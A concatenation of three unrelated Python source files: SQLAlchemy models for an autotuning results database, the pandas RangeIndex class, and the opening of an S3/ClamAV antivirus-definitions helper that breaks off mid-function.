except sqlalchemy.orm.exc.NoResultFound:
return None
@classmethod
def add_version(cls, session, version):
if not cls.has_version(session, version):
session.add(_Meta(db_version=version))
class Program(Base):
project = Column(String(128))
name = Column(String(128))
@classmethod
def get(cls, session, project, name):
try:
session.flush()
return session.query(Program).filter_by(project=project, name=name).one()
except sqlalchemy.orm.exc.NoResultFound:
t = Program(project=project, name=name)
session.add(t)
return t
class ProgramVersion(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program, backref='versions')
version = Column(String(128))
parameter_info = Column(Text)
@property
def name(self):
return self.program.name
@property
def project(self):
return self.program.project
@classmethod
def get(cls, session, project, name, version, parameter_info=None):
program = Program.get(session, project, name)
try:
session.flush()
if parameter_info is None:
return session.query(ProgramVersion).filter_by(program=program,
version=version).one()
else:
return session.query(ProgramVersion).filter_by(program=program,
version=version,
parameter_info=parameter_info).one()
except sqlalchemy.orm.exc.NoResultFound:
t = ProgramVersion(program=program, version=version, parameter_info=parameter_info)
session.add(t)
return t
class Configuration(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program)
hash = Column(String(64))
data = Column(PickleType(pickler=CompressedPickler))
@classmethod
def get(cls, session, program, hashv, datav):
try:
session.flush()
return (session.query(Configuration)
.filter_by(program=program, hash=hashv).one())
except sqlalchemy.orm.exc.NoResultFound:
t = Configuration(program=program, hash=hashv, data=datav)
session.add(t)
return t
Index('ix_configuration_custom1', Configuration.program_id, Configuration.hash)
class MachineClass(Base):
name = Column(String(128))
@classmethod
def get(cls, session, name):
try:
session.flush()
return session.query(MachineClass).filter_by(name=name).one()
except sqlalchemy.orm.exc.NoResultFound:
t = MachineClass(name=name)
session.add(t)
return t
class Machine(Base):
name = Column(String(128))
cpu = Column(String(128))
cores = Column(Integer)
memory_gb = Column(Float)
machine_class_id = Column(ForeignKey(MachineClass.id))
machine_class = relationship(MachineClass, backref='machines')
class InputClass(Base):
program_id = Column(ForeignKey(Program.id))
program = relationship(Program, backref='inputs')
name = Column(String(128))
size = Column(Integer)
@classmethod
def get(cls, session, program, name='default', size=-1):
try:
session.flush()
return session.query(InputClass).filter_by(program=program,
name=name,
size=size).one()
except sqlalchemy.orm.exc.NoResultFound:
t = InputClass(program=program, name=name, size=size)
session.add(t)
return t
class Input(Base):
# state = Column(Enum('ANY_MACHINE', 'SINGLE_MACHINE', 'DELETED'),
# default='ANY_MACHINE', name='t_input_state')
input_class_id = Column(ForeignKey(InputClass.id))
input_class = relationship(InputClass, backref='inputs')
# optional, set only for state='SINGLE_MACHINE'
# machine_id = Column(ForeignKey(MachineClass.id))
# machine = relationship(MachineClass, backref='inputs')
# optional, for use by InputManager
path = Column(Text)
extra = Column(PickleType(pickler=CompressedPickler))
class TuningRun(Base):
uuid = Column(String(32), index=True, unique=True)
program_version_id = Column(ForeignKey(ProgramVersion.id))
program_version = relationship(ProgramVersion, backref='tuning_runs')
machine_class_id = Column(ForeignKey(MachineClass.id))
machine_class = relationship(MachineClass, backref='tuning_runs')
input_class_id = Column(ForeignKey(InputClass.id))
input_class = relationship(InputClass, backref='tuning_runs')
name = Column(String(128), default='unnamed')
args = Column(PickleType(pickler=CompressedPickler))
objective = Column(PickleType(pickler=CompressedPickler))
state = Column(Enum('QUEUED', 'RUNNING', 'COMPLETE', 'ABORTED',
name='t_tr_state'),
default='QUEUED')
start_date = Column(DateTime, default=func.now())
end_date = Column(DateTime)
final_config_id = Column(ForeignKey(Configuration.id))
final_config = relationship(Configuration)
# __mapper_args__ = {'primary_key': uuid}
@property
def program(self):
return self.program_version.program
class Result(Base):
# set by MeasurementDriver:
configuration_id = Column(ForeignKey(Configuration.id))
configuration = relationship(Configuration)
machine_id = Column(ForeignKey(Machine.id))
machine = relationship(Machine, backref='results')
input_id = Column(ForeignKey(Input.id))
input = relationship(Input, backref='results')
tuning_run_id = Column(ForeignKey(TuningRun.id), index=True)
tuning_run = relationship(TuningRun, backref='results')
collection_date = Column(DateTime, default=func.now())
collection_cost = Column(Float)
# set by MeasurementInterface:
state = Column(Enum('OK', 'TIMEOUT', 'ERROR',
name='t_result_state'),
default='OK')
time = Column(Float)
accuracy = Column(Float)
energy = Column(Float)
size = Column(Float)
confidence = Column(Float)
# extra = Column(PickleType)
# set by SearchDriver
was_new_best = Column(Boolean)
Index('ix_result_custom1', Result.tuning_run_id, Result.was_new_best)
class DesiredResult(Base):
# set by the technique:
configuration_id = Column(ForeignKey(Configuration.id))
configuration = relationship(Configuration)
limit = Column(Float)
# set by the search driver
priority = Column(Float)
tuning_run_id = Column(ForeignKey(TuningRun.id))
tuning_run = relationship(TuningRun, backref='desired_results')
generation = Column(Integer)
requestor = Column(String(128))
request_date = Column(DateTime, default=func.now())
# set by the measurement driver
state = Column(Enum('UNKNOWN', 'REQUESTED', 'RUNNING',
'COMPLETE', 'ABORTED',
name="t_dr_state"),
default='UNKNOWN')
result_id = Column(ForeignKey(Result.id), index=True)
result = relationship(Result, backref='desired_results')
start_date = Column(DateTime)
# input_id = Column(ForeignKey(Input.id))
# input = relationship(Input, backref='desired_results')
Index('ix_desired_result_custom1', DesiredResult.tuning_run_id,
DesiredResult.generation)
Index('ix_desired_result_custom2', DesiredResult.tuning_run_id,
DesiredResult.configuration_id)
# track bandit meta-technique information if a bandit meta-technique is used for a tuning run.
class BanditInfo(Base):
tuning_run_id = Column(ForeignKey(TuningRun.id))
tuning_run = relationship(TuningRun, backref='bandit_info')
# the bandit exploration/exploitation tradeoff
c = Column(Float)
# the bandit window
window = Column(Integer)
class BanditSubTechnique(Base):
bandit_info_id = Column(ForeignKey(BanditInfo.id))
bandit_info = relationship(BanditInfo, backref='subtechniques')
name = Column(String(128))
if __name__ == '__main__':
# test:
engine = create_engine('sqlite:///:memory:', echo=True)
Base.metadata.create_all(engine)
|
|
from __future__ import annotations
from datetime import timedelta
import operator
from sys import getsizeof
from typing import (
TYPE_CHECKING,
Any,
Callable,
Hashable,
List,
cast,
)
import warnings
import numpy as np
from pandas._libs import (
index as libindex,
lib,
)
from pandas._libs.lib import no_default
from pandas._typing import (
Dtype,
npt,
)
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
ensure_platform_int,
ensure_python_int,
is_float,
is_integer,
is_scalar,
is_signed_integer_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCTimedeltaIndex
from pandas.core import ops
import pandas.core.common as com
from pandas.core.construction import extract_array
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import maybe_extract_name
from pandas.core.indexes.numeric import (
Float64Index,
Int64Index,
NumericIndex,
)
from pandas.core.ops.common import unpack_zerodim_and_defer
if TYPE_CHECKING:
from pandas import Index
_empty_range = range(0)
class RangeIndex(NumericIndex):
"""
Immutable Index implementing a monotonic integer range.
RangeIndex is a memory-saving special case of Int64Index limited to
representing monotonic ranges. Using RangeIndex may in some instances
improve computing speed.
This is the default index type used
by DataFrame and Series when no explicit index is provided by the user.
Parameters
----------
start : int (default: 0), range, or other RangeIndex instance
If int and "stop" is not given, interpreted as "stop" instead.
stop : int (default: 0)
step : int (default: 1)
dtype : np.int64
Unused, accepted for homogeneity with other index types.
copy : bool, default False
Unused, accepted for homogeneity with other index types.
name : object, optional
Name to be stored in the index.
Attributes
----------
start
stop
step
Methods
-------
from_range
See Also
--------
Index : The base pandas Index type.
Int64Index : Index of int64 data.
"""
_typ = "rangeindex"
_engine_type = libindex.Int64Engine
_dtype_validation_metadata = (is_signed_integer_dtype, "signed integer")
_range: range
_is_backward_compat_public_numeric_index: bool = False
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
start=None,
stop=None,
step=None,
dtype: Dtype | None = None,
copy: bool = False,
name: Hashable = None,
) -> RangeIndex:
cls._validate_dtype(dtype)
name = maybe_extract_name(name, start, cls)
# RangeIndex
if isinstance(start, RangeIndex):
return start.copy(name=name)
elif isinstance(start, range):
return cls._simple_new(start, name=name)
# validate the arguments
if com.all_none(start, stop, step):
raise TypeError("RangeIndex(...) must be called with integers")
start = ensure_python_int(start) if start is not None else 0
if stop is None:
start, stop = 0, start
else:
stop = ensure_python_int(stop)
step = ensure_python_int(step) if step is not None else 1
if step == 0:
raise ValueError("Step must not be zero")
rng = range(start, stop, step)
return cls._simple_new(rng, name=name)
@classmethod
def from_range(
cls, data: range, name=None, dtype: Dtype | None = None
) -> RangeIndex:
"""
Create RangeIndex from a range object.
Returns
-------
RangeIndex
"""
if not isinstance(data, range):
raise TypeError(
f"{cls.__name__}(...) must be called with object coercible to a "
f"range, {repr(data)} was passed"
)
cls._validate_dtype(dtype)
return cls._simple_new(data, name=name)
@classmethod
def _simple_new(cls, values: range, name: Hashable = None) -> RangeIndex:
result = object.__new__(cls)
assert isinstance(values, range)
result._range = values
result._name = name
result._cache = {}
result._reset_identity()
return result
# --------------------------------------------------------------------
# error: Return type "Type[Int64Index]" of "_constructor" incompatible with return
# type "Type[RangeIndex]" in supertype "Index"
@cache_readonly
def _constructor(self) -> type[Int64Index]: # type: ignore[override]
"""return the class to use for construction"""
return Int64Index
# error: Signature of "_data" incompatible with supertype "Index"
@cache_readonly
def _data(self) -> np.ndarray: # type: ignore[override]
"""
An int array that for performance reasons is created only when needed.
The constructed array is saved in ``_cache``.
"""
return np.arange(self.start, self.stop, self.step, dtype=np.int64)
def _get_data_as_items(self):
"""return a list of tuples of start, stop, step"""
rng = self._range
return [("start", rng.start), ("stop", rng.stop), ("step", rng.step)]
def __reduce__(self):
d = {"name": self.name}
d.update(dict(self._get_data_as_items()))
return ibase._new_Index, (type(self), d), None
# --------------------------------------------------------------------
# Rendering Methods
def _format_attrs(self):
"""
Return a list of tuples of the (attr, formatted_value)
"""
attrs = self._get_data_as_items()
if self.name is not None:
attrs.append(("name", ibase.default_pprint(self.name)))
return attrs
def _format_data(self, name=None):
# we are formatting thru the attributes
return None
def _format_with_header(self, header: list[str], na_rep: str) -> list[str]:
# Equivalent to Index implementation, but faster
if not len(self._range):
return header
first_val_str = str(self._range[0])
last_val_str = str(self._range[-1])
max_length = max(len(first_val_str), len(last_val_str))
return header + [f"{x:<{max_length}}" for x in self._range]
# --------------------------------------------------------------------
_deprecation_message = (
"RangeIndex.{} is deprecated and will be "
"removed in a future version. Use RangeIndex.{} "
"instead"
)
@property
def start(self) -> int:
"""
The value of the `start` parameter (``0`` if this was not supplied).
"""
# GH 25710
return self._range.start
@property
def _start(self) -> int:
"""
The value of the `start` parameter (``0`` if this was not supplied).
.. deprecated:: 0.25.0
Use ``start`` instead.
"""
warnings.warn(
self._deprecation_message.format("_start", "start"),
FutureWarning,
stacklevel=2,
)
return self.start
@property
def stop(self) -> int:
"""
The value of the `stop` parameter.
"""
return self._range.stop
@property
def _stop(self) -> int:
"""
The value of the `stop` parameter.
.. deprecated:: 0.25.0
Use ``stop`` instead.
"""
# GH 25710
warnings.warn(
self._deprecation_message.format("_stop", "stop"),
FutureWarning,
stacklevel=2,
)
return self.stop
@property
def step(self) -> int:
"""
The value of the `step` parameter (``1`` if this was not supplied).
"""
# GH 25710
return self._range.step
@property
def _step(self) -> int:
"""
The value of the `step` parameter (``1`` if this was not supplied).
.. deprecated:: 0.25.0
Use ``step`` instead.
"""
# GH 25710
warnings.warn(
self._deprecation_message.format("_step", "step"),
FutureWarning,
stacklevel=2,
)
return self.step
@cache_readonly
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
rng = self._range
return getsizeof(rng) + sum(
getsizeof(getattr(rng, attr_name))
for attr_name in ["start", "stop", "step"]
)
def memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of my values
Parameters
----------
deep : bool
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption
Returns
-------
bytes used
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False
See Also
--------
numpy.ndarray.nbytes
"""
return self.nbytes
@property
def dtype(self) -> np.dtype:
return np.dtype(np.int64)
@property
def is_unique(self) -> bool:
"""return if the index has unique values"""
return True
@cache_readonly
def is_monotonic_increasing(self) -> bool:
return self._range.step > 0 or len(self) <= 1
@cache_readonly
def is_monotonic_decreasing(self) -> bool:
return self._range.step < 0 or len(self) <= 1
def __contains__(self, key: Any) -> bool:
hash(key)
try:
key = ensure_python_int(key)
except TypeError:
return False
return key in self._range
@property
def inferred_type(self) -> str:
return "integer"
# --------------------------------------------------------------------
# Indexing Methods
@doc(Int64Index.get_loc)
def get_loc(self, key, method=None, tolerance=None):
if method is None and tolerance is None:
if is_integer(key) or (is_float(key) and key.is_integer()):
new_key = int(key)
try:
return self._range.index(new_key)
except ValueError as err:
raise KeyError(key) from err
self._check_indexing_error(key)
raise KeyError(key)
return super().get_loc(key, method=method, tolerance=tolerance)
def _get_indexer(
self,
target: Index,
method: str | None = None,
limit: int | None = None,
tolerance=None,
) -> npt.NDArray[np.intp]:
if com.any_not_none(method, tolerance, limit):
return super()._get_indexer(
target, method=method, tolerance=tolerance, limit=limit
)
if self.step > 0:
start, stop, step = self.start, self.stop, self.step
else:
# GH 28678: work on reversed range for simplicity
reverse = self._range[::-1]
start, stop, step = reverse.start, reverse.stop, reverse.step
target_array = np.asarray(target)
locs = target_array - start
valid = (locs % step == 0) & (locs >= 0) & (target_array < stop)
locs[~valid] = -1
locs[valid] = locs[valid] / step
if step != self.step:
# We reversed this range: transform to original locs
locs[valid] = len(self) - 1 - locs[valid]
return ensure_platform_int(locs)
# --------------------------------------------------------------------
def tolist(self) -> list[int]:
return list(self._range)
@doc(Int64Index.__iter__)
def __iter__(self):
yield from self._range
@doc(Int64Index._shallow_copy)
def _shallow_copy(self, values, name: Hashable = no_default):
name = self.name if name is no_default else name
if values.dtype.kind == "f":
return Float64Index(values, name=name)
return Int64Index._simple_new(values, name=name)
def _view(self: RangeIndex) -> RangeIndex:
result = type(self)._simple_new(self._range, name=self._name)
result._cache = self._cache
return result
@doc(Int64Index.copy)
def copy(
self,
name: Hashable = None,
deep: bool = False,
dtype: Dtype | None = None,
names=None,
):
name = self._validate_names(name=name, names=names, deep=deep)[0]
new_index = self._rename(name=name)
if dtype:
warnings.warn(
"parameter dtype is deprecated and will be removed in a future "
"version. Use the astype method instead.",
FutureWarning,
stacklevel=2,
)
new_index = new_index.astype(dtype)
return new_index
def _minmax(self, meth: str):
no_steps = len(self) - 1
if no_steps == -1:
return np.nan
elif (meth == "min" and self.step > 0) or (meth == "max" and self.step < 0):
return self.start
return self.start + self.step * no_steps
def min(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""The minimum value of the RangeIndex"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return self._minmax("min")
def max(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""The maximum value of the RangeIndex"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return self._minmax("max")
def argsort(self, *args, **kwargs) -> npt.NDArray[np.intp]:
"""
Returns the indices that would sort the index and its
underlying data.
Returns
-------
np.ndarray[np.intp]
See Also
--------
numpy.ndarray.argsort
"""
ascending = kwargs.pop("ascending", True) # EA compat
kwargs.pop("kind", None) # e.g. "mergesort" is irrelevant
nv.validate_argsort(args, kwargs)
if self._range.step > 0:
result = np.arange(len(self), dtype=np.intp)
else:
result = np.arange(len(self) - 1, -1, -1, dtype=np.intp)
if not ascending:
result = result[::-1]
return result
def factorize(
self, sort: bool = False, na_sentinel: int | None = -1
) -> tuple[npt.NDArray[np.intp], RangeIndex]:
codes = np.arange(len(self), dtype=np.intp)
uniques = self
if sort and self.step < 0:
codes = codes[::-1]
uniques = uniques[::-1]
return codes, uniques
def equals(self, other: object) -> bool:
"""
Determines if two Index objects contain the same elements.
"""
if isinstance(other, RangeIndex):
return self._range == other._range
return super().equals(other)
def sort_values(
self,
return_indexer: bool = False,
ascending: bool = True,
na_position: str = "last",
key: Callable | None = None,
):
sorted_index = self
indexer = RangeIndex(range(len(self)))
if key is not None:
return super().sort_values(
return_indexer=return_indexer,
ascending=ascending,
na_position=na_position,
key=key,
)
else:
sorted_index = self
if ascending:
if self.step < 0:
sorted_index = self[::-1]
indexer = indexer[::-1]
else:
if self.step > 0:
sorted_index = self[::-1]
indexer = indexer = indexer[::-1]
if return_indexer:
return sorted_index, indexer
else:
return sorted_index
# --------------------------------------------------------------------
# Set Operations
def _intersection(self, other: Index, sort=False):
# caller is responsible for checking self and other are both non-empty
if not isinstance(other, RangeIndex):
# Int64Index
return super()._intersection(other, sort=sort)
first = self._range[::-1] if self.step < 0 else self._range
second = other._range[::-1] if other.step < 0 else other._range
# check whether intervals intersect
# deals with in- and decreasing ranges
int_low = max(first.start, second.start)
int_high = min(first.stop, second.stop)
if int_high <= int_low:
return self._simple_new(_empty_range)
# Method hint: linear Diophantine equation
# solve intersection problem
# performance hint: for identical step sizes, could use
# cheaper alternative
gcd, s, _ = self._extended_gcd(first.step, second.step)
# check whether element sets intersect
if (first.start - second.start) % gcd:
return self._simple_new(_empty_range)
# calculate parameters for the RangeIndex describing the
# intersection disregarding the lower bounds
tmp_start = first.start + (second.start - first.start) * first.step // gcd * s
new_step = first.step * second.step // gcd
new_range = range(tmp_start, int_high, new_step)
new_index = self._simple_new(new_range)
# adjust index to limiting interval
new_start = new_index._min_fitting_element(int_low)
new_range = range(new_start, new_index.stop, new_index.step)
new_index = self._simple_new(new_range)
if (self.step < 0 and other.step < 0) is not (new_index.step < 0):
new_index = new_index[::-1]
if sort is None:
new_index = new_index.sort_values()
return new_index
def _min_fitting_element(self, lower_limit: int) -> int:
"""Returns the smallest element greater than or equal to the limit"""
no_steps = -(-(lower_limit - self.start) // abs(self.step))
return self.start + abs(self.step) * no_steps
def _extended_gcd(self, a: int, b: int) -> tuple[int, int, int]:
"""
Extended Euclidean algorithms to solve Bezout's identity:
a*x + b*y = gcd(x, y)
Finds one particular solution for x, y: s, t
Returns: gcd, s, t
"""
s, old_s = 0, 1
t, old_t = 1, 0
r, old_r = b, a
while r:
quotient = old_r // r
old_r, r = r, old_r - quotient * r
old_s, s = s, old_s - quotient * s
old_t, t = t, old_t - quotient * t
return old_r, old_s, old_t
def _union(self, other: Index, sort):
"""
Form the union of two Index objects and sorts if possible
Parameters
----------
other : Index or array-like
sort : False or None, default None
Whether to sort resulting index. ``sort=None`` returns a
monotonically increasing ``RangeIndex`` if possible or a sorted
``Int64Index`` if not. ``sort=False`` always returns an
unsorted ``Int64Index``
.. versionadded:: 0.25.0
Returns
-------
union : Index
"""
if isinstance(other, RangeIndex) and sort is None:
start_s, step_s = self.start, self.step
end_s = self.start + self.step * (len(self) - 1)
start_o, step_o = other.start, other.step
end_o = other.start + other.step * (len(other) - 1)
if self.step < 0:
start_s, step_s, end_s = end_s, -step_s, start_s
if other.step < 0:
start_o, step_o, end_o = end_o, -step_o, start_o
if len(self) == 1 and len(other) == 1:
step_s = step_o = abs(self.start - other.start)
elif len(self) == 1:
step_s = step_o
elif len(other) == 1:
step_o = step_s
start_r = min(start_s, start_o)
end_r = max(end_s, end_o)
if step_o == step_s:
if (
(start_s - start_o) % step_s == 0
and (start_s - end_o) <= step_s
and (start_o - end_s) <= step_s
):
return type(self)(start_r, end_r + step_s, step_s)
if (
(step_s % 2 == 0)
and (abs(start_s - start_o) == step_s / 2)
and (abs(end_s - end_o) == step_s / 2)
):
# e.g. range(0, 10, 2) and range(1, 11, 2)
# but not range(0, 20, 4) and range(1, 21, 4) GH#44019
return type(self)(start_r, end_r + step_s / 2, step_s / 2)
elif step_o % step_s == 0:
if (
(start_o - start_s) % step_s == 0
and (start_o + step_s >= start_s)
and (end_o - step_s <= end_s)
):
return type(self)(start_r, end_r + step_s, step_s)
elif step_s % step_o == 0:
if (
(start_s - start_o) % step_o == 0
and (start_s + step_o >= start_o)
and (end_s - step_o <= end_o)
):
return type(self)(start_r, end_r + step_o, step_o)
return super()._union(other, sort=sort)
def _difference(self, other, sort=None):
# optimized set operation if we have another RangeIndex
self._validate_sort_keyword(sort)
self._assert_can_do_setop(other)
other, result_name = self._convert_can_do_setop(other)
if not isinstance(other, RangeIndex):
return super()._difference(other, sort=sort)
if sort is None and self.step < 0:
return self[::-1]._difference(other)
res_name = ops.get_op_result_name(self, other)
first = self._range[::-1] if self.step < 0 else self._range
overlap = self.intersection(other)
if overlap.step < 0:
overlap = overlap[::-1]
if len(overlap) == 0:
return self.rename(name=res_name)
if len(overlap) == len(self):
return self[:0].rename(res_name)
# overlap.step will always be a multiple of self.step (see _intersection)
if len(overlap) == 1:
if overlap[0] == self[0]:
return self[1:]
elif overlap[0] == self[-1]:
return self[:-1]
elif len(self) == 3 and overlap[0] == self[1]:
return self[::2]
else:
return super()._difference(other, sort=sort)
elif len(overlap) == 2 and overlap[0] == first[0] and overlap[-1] == first[-1]:
# e.g. range(-8, 20, 7) and range(13, -9, -3)
return self[1:-1]
if overlap.step == first.step:
if overlap[0] == first.start:
# The difference is everything after the intersection
new_rng = range(overlap[-1] + first.step, first.stop, first.step)
elif overlap[-1] == first[-1]:
# The difference is everything before the intersection
new_rng = range(first.start, overlap[0], first.step)
elif overlap._range == first[1:-1]:
# e.g. range(4) and range(1, 3)
step = len(first) - 1
new_rng = first[::step]
else:
# The difference is not range-like
# e.g. range(1, 10, 1) and range(3, 7, 1)
return super()._difference(other, sort=sort)
else:
# We must have len(self) > 1, bc we ruled out above
# len(overlap) == 0 and len(overlap) == len(self)
assert len(self) > 1
if overlap.step == first.step * 2:
if overlap[0] == first[0] and overlap[-1] in (first[-1], first[-2]):
# e.g. range(1, 10, 1) and range(1, 10, 2)
new_rng = first[1::2]
elif overlap[0] == first[1] and overlap[-1] in (first[-1], first[-2]):
# e.g. range(1, 10, 1) and range(2, 10, 2)
new_rng = first[::2]
else:
# We can get here with e.g. range(20) and range(0, 10, 2)
return super()._difference(other, sort=sort)
else:
# e.g. range(10) and range(0, 10, 3)
return super()._difference(other, sort=sort)
new_index = type(self)._simple_new(new_rng, name=res_name)
if first is not self._range:
new_index = new_index[::-1]
return new_index
def symmetric_difference(self, other, result_name: Hashable = None, sort=None):
if not isinstance(other, RangeIndex) or sort is not None:
return super().symmetric_difference(other, result_name, sort)
left = self.difference(other)
right = other.difference(self)
result = left.union(right)
if result_name is not None:
result = result.rename(result_name)
return result
# --------------------------------------------------------------------
# error: Return type "Index" of "delete" incompatible with return type
# "RangeIndex" in supertype "Index"
def delete(self, loc) -> Index: # type: ignore[override]
# In some cases we can retain RangeIndex, see also
# DatetimeTimedeltaMixin._get_delete_Freq
if is_integer(loc):
if loc == 0 or loc == -len(self):
return self[1:]
if loc == -1 or loc == len(self) - 1:
return self[:-1]
if len(self) == 3 and (loc == 1 or loc == -2):
return self[::2]
elif lib.is_list_like(loc):
slc = lib.maybe_indices_to_slice(np.asarray(loc, dtype=np.intp), len(self))
if isinstance(slc, slice):
# defer to RangeIndex._difference, which is optimized to return
# a RangeIndex whenever possible
other = self[slc]
return self.difference(other, sort=False)
return super().delete(loc)
def insert(self, loc: int, item) -> Index:
if len(self) and (is_integer(item) or is_float(item)):
# We can retain RangeIndex is inserting at the beginning or end,
# or right in the middle.
rng = self._range
if loc == 0 and item == self[0] - self.step:
new_rng = range(rng.start - rng.step, rng.stop, rng.step)
return type(self)._simple_new(new_rng, name=self.name)
elif loc == len(self) and item == self[-1] + self.step:
new_rng = range(rng.start, rng.stop + rng.step, rng.step)
return type(self)._simple_new(new_rng, name=self.name)
elif len(self) == 2 and item == self[0] + self.step / 2:
# e.g. inserting 1 into [0, 2]
step = int(self.step / 2)
new_rng = range(self.start, self.stop, step)
return type(self)._simple_new(new_rng, name=self.name)
return super().insert(loc, item)
def _concat(self, indexes: list[Index], name: Hashable) -> Index:
"""
Overriding parent method for the case of all RangeIndex instances.
When all members of "indexes" are of type RangeIndex: result will be
RangeIndex if possible, Int64Index otherwise. E.g.:
indexes = [RangeIndex(3), RangeIndex(3, 6)] -> RangeIndex(6)
indexes = [RangeIndex(3), RangeIndex(4, 6)] -> Int64Index([0,1,2,4,5])
"""
if not all(isinstance(x, RangeIndex) for x in indexes):
return super()._concat(indexes, name)
elif len(indexes) == 1:
return indexes[0]
rng_indexes = cast(List[RangeIndex], indexes)
start = step = next_ = None
# Filter the empty indexes
non_empty_indexes = [obj for obj in rng_indexes if len(obj)]
for obj in non_empty_indexes:
rng = obj._range
if start is None:
# This is set by the first non-empty index
start = rng.start
if step is None and len(rng) > 1:
step = rng.step
elif step is None:
# First non-empty index had only one element
if rng.start == start:
values = np.concatenate([x._values for x in rng_indexes])
result = Int64Index(values)
return result.rename(name)
step = rng.start - start
non_consecutive = (step != rng.step and len(rng) > 1) or (
next_ is not None and rng.start != next_
)
if non_consecutive:
result = Int64Index(np.concatenate([x._values for x in rng_indexes]))
return result.rename(name)
if step is not None:
next_ = rng[-1] + step
if non_empty_indexes:
# Get the stop value from "next" or alternatively
# from the last non-empty index
stop = non_empty_indexes[-1].stop if next_ is None else next_
return RangeIndex(start, stop, step).rename(name)
# Here all "indexes" had 0 length, i.e. were empty.
# In this case return an empty range index.
return RangeIndex(0, 0).rename(name)
def __len__(self) -> int:
"""
return the length of the RangeIndex
"""
return len(self._range)
@property
def size(self) -> int:
return len(self)
def __getitem__(self, key):
"""
Conserve RangeIndex type for scalar and slice keys.
"""
if isinstance(key, slice):
new_range = self._range[key]
return self._simple_new(new_range, name=self._name)
elif is_integer(key):
new_key = int(key)
try:
return self._range[new_key]
except IndexError as err:
raise IndexError(
f"index {key} is out of bounds for axis 0 with size {len(self)}"
) from err
elif is_scalar(key):
raise IndexError(
"only integers, slices (`:`), "
"ellipsis (`...`), numpy.newaxis (`None`) "
"and integer or boolean "
"arrays are valid indices"
)
# fall back to Int64Index
return super().__getitem__(key)
def _getitem_slice(self: RangeIndex, slobj: slice) -> RangeIndex:
"""
Fastpath for __getitem__ when we know we have a slice.
"""
res = self._range[slobj]
return type(self)._simple_new(res, name=self._name)
@unpack_zerodim_and_defer("__floordiv__")
def __floordiv__(self, other):
if is_integer(other) and other != 0:
if len(self) == 0 or self.start % other == 0 and self.step % other == 0:
start = self.start // other
step = self.step // other
stop = start + len(self) * step
new_range = range(start, stop, step or 1)
return self._simple_new(new_range, name=self.name)
if len(self) == 1:
start = self.start // other
new_range = range(start, start + 1, 1)
return self._simple_new(new_range, name=self.name)
return super().__floordiv__(other)
# --------------------------------------------------------------------
# Reductions
def all(self, *args, **kwargs) -> bool:
return 0 not in self._range
def any(self, *args, **kwargs) -> bool:
return any(self._range)
# --------------------------------------------------------------------
def _cmp_method(self, other, op):
if isinstance(other, RangeIndex) and self._range == other._range:
# Both are immutable so if ._range attr. are equal, shortcut is possible
return super()._cmp_method(self, op)
return super()._cmp_method(other, op)
def _arith_method(self, other, op):
"""
Parameters
----------
other : Any
op : callable that accepts 2 params
perform the binary op
"""
if isinstance(other, ABCTimedeltaIndex):
# Defer to TimedeltaIndex implementation
return NotImplemented
elif isinstance(other, (timedelta, np.timedelta64)):
# GH#19333 is_integer evaluated True on timedelta64,
# so we need to catch these explicitly
return super()._arith_method(other, op)
elif is_timedelta64_dtype(other):
# Must be an np.ndarray; GH#22390
return super()._arith_method(other, op)
if op in [
operator.pow,
ops.rpow,
operator.mod,
ops.rmod,
operator.floordiv,
ops.rfloordiv,
divmod,
ops.rdivmod,
]:
return super()._arith_method(other, op)
step: Callable | None = None
if op in [operator.mul, ops.rmul, operator.truediv, ops.rtruediv]:
step = op
# TODO: if other is a RangeIndex we may have more efficient options
right = extract_array(other, extract_numpy=True, extract_range=True)
left = self
try:
# apply if we have an override
if step:
with np.errstate(all="ignore"):
rstep = step(left.step, right)
# we don't have a representable op
# so return a base index
if not is_integer(rstep) or not rstep:
raise ValueError
else:
rstep = left.step
with np.errstate(all="ignore"):
rstart = op(left.start, right)
rstop = op(left.stop, right)
res_name = ops.get_op_result_name(self, other)
result = type(self)(rstart, rstop, rstep, name=res_name)
# for compat with numpy / Int64Index
# even if we can represent as a RangeIndex, return
# as a Float64Index if we have float-like descriptors
if not all(is_integer(x) for x in [rstart, rstop, rstep]):
result = result.astype("float64")
return result
except (ValueError, TypeError, ZeroDivisionError):
# Defer to Int64Index implementation
# test_arithmetic_explicit_conversions
return super()._arith_method(other, op)
|
|
# -*- coding: utf-8 -*-
# Upside Travel, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import hashlib
import os
import pwd
import re
import subprocess
import boto3
import botocore
from pytz import utc
from common import AV_DEFINITION_S3_PREFIX, S3_ENDPOINT
from common import AV_DEFINITION_PATH
from common import AV_DEFINITION_FILE_PREFIXES
from common import AV_DEFINITION_FILE_SUFFIXES
from common import AV_SIGNATURE_OK
from common import AV_SIGNATURE_UNKNOWN
from common import AV_STATUS_CLEAN
from common import AV_STATUS_INFECTED
from common import CLAMAVLIB_PATH
from common import CLAMSCAN_PATH
from common import FRESHCLAM_PATH
from common import create_dir
RE_SEARCH_DIR = r"SEARCH_DIR\(\"=([A-z0-9\/\-_]*)\"\)"
def current_library_search_path():
ld_verbose = subprocess.check_output(["ld", "--verbose"]).decode("utf-8")
rd_ld = re.compile(RE_SEARCH_DIR)
return rd_ld.findall(ld_verbose)
def update_defs_from_s3(s3_client, bucket, prefix):
create_dir(AV_DEFINITION_PATH)
to_download = {}
for file_prefix in AV_DEFINITION_FILE_PREFIXES:
s3_best_time = None
for file_suffix in AV_DEFINITION_FILE_SUFFIXES:
